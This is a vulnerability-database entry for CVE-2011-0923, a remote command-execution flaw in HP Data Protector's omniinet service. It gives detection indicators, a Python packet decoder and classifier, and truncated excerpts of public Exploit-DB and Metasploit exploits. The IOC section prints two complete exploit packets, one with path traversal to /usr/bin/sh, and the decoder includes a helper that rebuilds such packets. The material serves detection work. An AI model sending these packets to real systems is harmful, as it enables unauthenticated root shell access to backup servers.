CVE-2011-0923
Published: 2011-02-09
Priority: P2 (76) · Severity: critical · CVSS 2.0 base score: 10.0
CVSS 2.0 vector: AV:N/AC:L/Au:N/C:C/I:C/A:C
Exploit: public exploits available (Exploit-DB and Metasploit entries below)
EPSS: 81.08% (99.6th percentile)
The client in HP Data Protector does not properly validate EXEC_CMD arguments, which allows remote attackers to execute arbitrary Perl code via a crafted command, related to the "local bin directory."
Detection & IOCs (extracted from sources)
bytes (EXEC_CMD packet from the Windows PoC; traverses to \windows\system32\ipconfig.exe):
\x00\x00\x00\xa4\x20\x32\x00\x20\x66\x64\x69\x73\x6b\x79\x6f\x75\x00\x20\x30\x00\x20\x53\x59\x53\x54\x45\x4d\x00\x20\x66\x64\x69\x73\x6b\x79\x6f\x75\x00\x20\x43\x00\x20\x32\x30\x00\x20\x66\x64\x69\x73\x6b\x79\x6f\x75\x00\x20\x50\x6f\x63\x00\x20\x4e\x54\x41\x55\x54\x48\x4f\x52\x49\x54\x59\x00\x20\x4e\x54\x41\x55\x54\x48\x4f\x52\x49\x54\x59\x00\x20\x4e\x54\x41\x55\x54\x48\x4f\x52\x49\x54\x59\x00\x20\x30\x00\x20\x30\x00\x20\x2e\x2e\x2f\x2e\x2e\x2f\x2e\x2e\x2f\x2e\x2e\x2f\x2e\x2e\x2f\x2e\x2e\x2f\x2e\x2e\x2f\x2e\x2e\x2f\x2e\x2e\x2f\x2e\x2e\x2f\x5c\x77\x69\x6e\x64\x6f\x77\x73\x5c\x73\x79\x73\x74\x65\x6d\x33\x32\x5c\x69\x70\x63\x6f\x6e\x66\x69\x67\x2e\x65\x78\x65\x00\x00
bytes (EXEC_CMD packet from the HP-UX PoC; traverses to /usr/bin/sh):
\x00\x00\x00\xa4\x20\x32\x00\x20\x2d\x2d\x63\x68\x30\x6b\x73\x2d\x00\x20\x30\x00\x20\x53\x59\x53\x54\x45\x4d\x00\x20\x2d\x63\x68\x30\x6b\x73\x2d\x2d\x00\x20\x43\x00\x20\x32\x30\x00\x20\x2d\x2d\x63\x68\x30\x6b\x73\x2d\x00\x20\x50\x6f\x63\x00\x20\x2d\x72\x30\x30\x74\x2d\x72\x30\x30\x74\x2d\x00\x20\x2d\x72\x30\x30\x74\x2d\x72\x30\x30\x74\x2d\x00\x20\x2d\x72\x30\x30\x74\x2d\x72\x30\x30\x74\x2d\x00\x20\x30\x00\x20\x30\x00\x20\x2e\x2e\x2f\x2e\x2e\x2f\x2e\x2e\x2f\x2e\x2e\x2f\x2e\x2e\x2f\x2e\x2e\x2f\x2e\x2e\x2f\x2e\x2e\x2f\x2e\x2e\x2f\x75\x73\x72\x2f\x62\x69\x6e\x2f\x73\x68\x00
- Monitor TCP port 5555, the HP Data Protector omniinet service; every public exploit for this CVE targets that port.
- Detect EXEC_CMD packets sent to port 5555 whose payload contains path traversal sequences (e.g., '../../'); the traversal escapes the Data Protector bin directory to reach arbitrary binaries.
- On Linux/HP-UX targets, alert on EXEC_CMD packets that resolve to '/bin/sh' or '/usr/bin/sh' via traversal; this is an attempt to spawn a root shell.
- On Windows targets, detect EXEC_CMD packets referencing 'perl.exe' together with inline '-esystem()' arguments; this is the technique used to bypass the single-command, no-arguments restriction and run arbitrary commands.
- Flag omniinet.exe spawning unexpected child processes (e.g., cmd.exe, perl.exe, sh); this indicates successful EXEC_CMD exploitation.
- Use the 4-byte big-endian length prefix '\x00\x00\x00\xa4' at the start of a TCP payload on port 5555, followed by the '\x20\x32' opcode bytes, as a signature for the known EXEC_CMD exploit packets. Do not require the declared length to match the actual payload: the HP-UX packet above keeps the 0xa4 (164-byte) prefix of the Windows packet although its body is only 140 bytes long.
- On Windows, omniinet.exe validates the filename with FindFirstFileW() before executing it; if the file is not found, exploitation fails, so the attacker must supply the path of an existing binary (e.g., perl.exe inside the Data Protector install path).
- The Windows EXEC_CMD variant cannot pass arguments directly to arbitrary binaries, because an appended argument is treated as part of the filename and the lookup fails; the perl.exe trick is what makes commands with parameters possible. The base path of the supplied command begins under C:\.
- The attack is unauthenticated; no credentials are needed to send a malicious EXEC_CMD packet to the omniinet service on port 5555.
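The packet layout behind the signature in the list above, as an added example that is not code from any PoC or Metasploit module on this page: a small Python decoder that splits the two captured packets into their fields, applies the indicators from the list (traversal, a Unix shell target, perl.exe with inline system(), the 0xa4 + ' 2' header) and reports the declared-versus-actual length mismatch of the HP-UX packet. The wire layout (4-byte big-endian length, then fields encoded as a space, the value and a NUL) is read off the captured bytes; the tag names, the `encode_exec_cmd` helper for replaying captures against an IDS, and the meaning attached to any field other than the opcode and the final path are my assumptions.

```python
"""
Decoder and classifier for HP Data Protector omniinet EXEC_CMD packets
(CVE-2011-0923). Added example; not code from any PoC or module on this page.
Layout read off the captured packets: 4-byte big-endian length, then fields
encoded as b" " + value + b"\x00". Field semantics beyond the opcode and the
final command path are not documented on the page and are not assumed here.
"""
import struct

OMNIINET_PORT = 5555
KNOWN_EXPLOIT_PREFIX = b"\x00\x00\x00\xa4"  # length prefix used by the public PoCs
EXEC_CMD_OPCODE = b"2"                      # first field, b" 2\x00" on the wire

# The two packets quoted in the IOC section, written as readable byte literals
# instead of \x-escapes (same bytes).
WINDOWS_PKT = (
    b"\x00\x00\x00\xa4"
    b" 2\x00 fdiskyou\x00 0\x00 SYSTEM\x00 fdiskyou\x00 C\x00 20\x00 fdiskyou\x00"
    b" Poc\x00 NTAUTHORITY\x00 NTAUTHORITY\x00 NTAUTHORITY\x00 0\x00 0\x00"
    b" ../../../../../../../../../../\\windows\\system32\\ipconfig.exe\x00\x00"
)
HPUX_PKT = (
    b"\x00\x00\x00\xa4"
    b" 2\x00 --ch0ks-\x00 0\x00 SYSTEM\x00 -ch0ks--\x00 C\x00 20\x00 --ch0ks-\x00"
    b" Poc\x00 -r00t-r00t-\x00 -r00t-r00t-\x00 -r00t-r00t-\x00 0\x00 0\x00"
    b" ../../../../../../../../../usr/bin/sh\x00"
)


def encode_exec_cmd(fields, declared_len=None, terminator=True):
    """Rebuild a packet from its fields (e.g. to replay a capture at an IDS).
    declared_len overrides the length prefix so the HP-UX quirk can be reproduced."""
    body = b"".join(b" " + f + b"\x00" for f in fields)
    if terminator:
        body += b"\x00"  # the Windows capture ends the field list with an empty field
    length = len(body) if declared_len is None else declared_len
    return struct.pack(">I", length) + body


def parse_exec_cmd(pkt):
    """Split a raw omniinet message into its length prefix and field values.
    The declared length is reported but never trusted: the HP-UX PoC keeps the
    0xa4 prefix of the Windows packet although its body is only 140 bytes."""
    if len(pkt) < 4:
        raise ValueError("packet shorter than the 4-byte length prefix")
    declared = struct.unpack(">I", pkt[:4])[0]
    body = pkt[4:]
    fields = []
    for chunk in body.split(b"\x00"):
        if not chunk:
            continue  # empty chunk: the terminator (or a double NUL)
        fields.append(chunk[1:] if chunk[:1] == b" " else chunk)
    return {"declared_len": declared, "actual_len": len(body), "fields": fields}


def classify(pkt, dst_port=OMNIINET_PORT):
    """Return sorted detection tags for one TCP payload, following the IOC list.
    Tag names are assumptions made for this example."""
    if dst_port != OMNIINET_PORT:
        return []
    info = parse_exec_cmd(pkt)
    fields = info["fields"]
    if not fields or fields[0] != EXEC_CMD_OPCODE:
        return []
    tags = {"exec-cmd"}
    if pkt[:4] == KNOWN_EXPLOIT_PREFIX:
        tags.add("known-exploit-header")
    if info["declared_len"] != info["actual_len"]:
        tags.add("length-mismatch")
    joined = b"\x00".join(fields).lower()
    if b"../" in joined or b"..\\" in joined:
        tags.add("path-traversal")
    if joined.endswith(b"/bin/sh"):  # matches both /bin/sh and /usr/bin/sh
        tags.add("unix-shell")
    if b"perl.exe" in joined:
        tags.add("perl-exe")
        if b"-e" in joined and b"system(" in joined:
            tags.add("perl-inline-system")
    if joined.endswith(b".exe"):
        tags.add("windows-binary")
    return sorted(tags)


if __name__ == "__main__":
    for name, pkt in (("windows", WINDOWS_PKT), ("hpux", HPUX_PKT)):
        info = parse_exec_cmd(pkt)
        print(name, info["declared_len"], info["actual_len"],
              info["fields"][-1], classify(pkt))
```

Because `parse_exec_cmd` splits on NUL rather than on the declared length, it still yields the command path of the HP-UX packet, which a parser that trusted the 0xa4 prefix would reject or truncate.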
No detection rules found.
Exploit-DB: HP Data Protector - Remote Command Execution (exploitdb, 2013-08-07, CVSS 10.0, CVE-2011-0923 [CRITICAL])
---
"""
HP Data Protector Arbitrary Remote Command Execution
This script allows you to execute a command with an arbitrary number of
arguments. The trick calls the 'perl.exe' interpreter installed with HP Data
Protector inside the directory {install_path}/bin/.
The main goal of the script is to bypass the limitation of executing only a
single command without any parameters, which is all the already existing
exploits provide. As shown below, it is possible to exploit the security issue
in order to run any command on the target system.
Target OS:
Microsoft Windows
Tested Version:
HP Data Protector A.06.20
Usage:
exploit.py <host> <port> '<command>'
Example:
exploit.py 192.168.1.1 5555 'dir c:\'
exploit.py 192.168.1.1 5555 'ipconfig /all'
exploit.py 192.168.1.1 5555 'net user userb
Exploit-DB: HP Data Protector 6.1 - EXEC_CMD Remote Code Execution (Metasploit) (exploitdb, 2012-02-25, CVE-2011-0923)
---
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote

  def initialize(info = {})
    super(update_info(info,
      'Name'        => 'HP Data Protector 6.1 EXEC_CMD Remote Code Execution',
      'Description' => %q{
          This exploit abuses a vulnerability in the HP Data Protector service. This
          flaw allows an unauthenticated attacker to take advantage of the EXEC_CMD
          command and traverse back to /bin/sh, which allows arbitrary remote code
          execution under the context of root.
      },
      'Author'      =>
        [
          'ch0ks',     # poc
          'c4an',      # msf poc
          'wireghoul'  # Improved msf
        ],
      'References'  =>
Exploit-DB: HP Data Protector (Linux) - Remote Command Execution (exploitdb, 2011-08-10, CVSS 10.0, CVE-2011-0923 [CRITICAL])
---
#!/bin/bash
# Exploit Title: HP Data Protector Remote Root Shell for Linux
# Date: 2011-08-10
# Author: SZ
# Software Link: http://www8.hp.com/us/en/software/software-product.html?compURI=tcm:245-936920&pageTitle=data-protector
# Version: 0.9
# Tested on: HP-UX, Linux
# CVE: CVE-2011-0923
# Notes: ZDI-11-055
# Reference: http://www.zerodayinitiative.com/advisories/ZDI-11-055/
# Reference: http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c02781143
#
# Ported from HPUX to Linux: minor change /usr/bin/sh -> /bin/sh
# Ported to HPUX from fdisk's (@fdiskyou) Windows version.
# Windows version: http://www.exploit-db.com/exploits/17339/
#
[ $# -lt 3 ] && echo -en "Syntax: `basename ${0}` <host> <port> <command>\n\n`basename ${0}` 10.2
Exploit-DB: HP Data Protector (HP-UX) - Remote Shell (exploitdb, 2011-08-05, CVSS 10.0, CVE-2011-0923 [CRITICAL])
---
#!/bin/bash
# Exploit Title: HP Data Protector Remote Shell for HPUX
# Date: 2011-08-02
# Author: Adrian Puente Z.
# Software Link: http://www8.hp.com/us/en/software/software-product.html?compURI=tcm:245-936920&pageTitle=data-protector
# Version: 0.9
# Tested on: HPUX
# CVE: CVE-2011-0923
# Notes: ZDI-11-055
# Reference: http://www.zerodayinitiative.com/advisories/ZDI-11-055/
# Reference: http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c02781143
#
# Powered by Hackarandas www.hackarandas.com
# Reachme at ch0ks _at_ hackarandas _dot_ com || @ch0ks
# Lots of thanks to David Llorens (@c4an) for all the help.
# Ported to HPUX from fdisk's (@fdiskyou) Windows version.
# Windows version: http://www.exploit-db.com/exploits
Exploit-DB: HP Data Protector Client 6.11 - 'EXEC_CMD' Remote Code Execution (exploitdb, 2011-05-28, CVSS 10.0, CVE-2011-0923 [CRITICAL])
---
# Exploit Title: HP Data Protector Client EXEC_CMD Remote Code Execution Vulnerability PoC (ZDI-11-055)
# Date: 2011-05-28
# Author: @fdiskyou
# e-mail: rui at deniable.org
# Version: 6.11
# Tested on: Windows 2003 Server SP2 en
# CVE: CVE-2011-0923
# Notes: ZDI-11-055
# Reference: http://www.zerodayinitiative.com/advisories/ZDI-11-055/
# Reference: http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c02781143
#
# Greetz to all the Exploit-DB Dev Team.
import socket
import sys

# Expect exactly two arguments: the target host and the omniinet port (5555).
if len(sys.argv) != 3:
    print "Usage: ./ZDI-11-055.py <host> <port>"
    sys.exit(1)

host = sys.argv[1]
port = int(sys.argv[2])
# The following PoC takes advantage of a Directory Path Traversal to execute ipconfig.exe on the remote host.
# Tw
Metasploit: HP Data Protector 6 EXEC_CMD Remote Code Execution
This exploit abuses a vulnerability in the HP Data Protector service. This flaw allows an unauthenticated attacker to take advantage of the EXEC_CMD command and traverse back to /bin/sh, which allows arbitrary remote code execution under the context of root.
Metasploit: HP Data Protector 6.1 EXEC_CMD Command Execution
This module exploits HP Data Protector's omniinet process, specifically against a Windows setup. When an EXEC_CMD packet is sent, omniinet.exe will attempt to look up the user-supplied filename with kernel32!FindFirstFileW(). If the file is found, the process will then go ahead and execute it with CreateProcess() under a new thread. If the filename isn't found, FindFirstFileW() returns an error (0x03) and the process bails early without calling CreateProcess(). Because of this behaviour, if you try to supply an argument, FindFirstFileW() treats it as part of the filename and the lookup fails. Please note that when you specify the 'CMD' option, the base path begins under C:\.
No writeups or analysis indexed.
References:
- http://dvlabs.tippingpoint.com/blog/2011/02/07/zdi-disclosure-hp
- http://marc.info/?l=bugtraq&m=130391284726795&w=2
- http://securityreason.com/securityalert/8261
- http://securityreason.com/securityalert/8323
- http://securityreason.com/securityalert/8329
- http://www.securityfocus.com/bid/46234
- http://www.vupen.com/english/advisories/2011/0308
- http://zerodayinitiative.com/advisories/ZDI-11-055/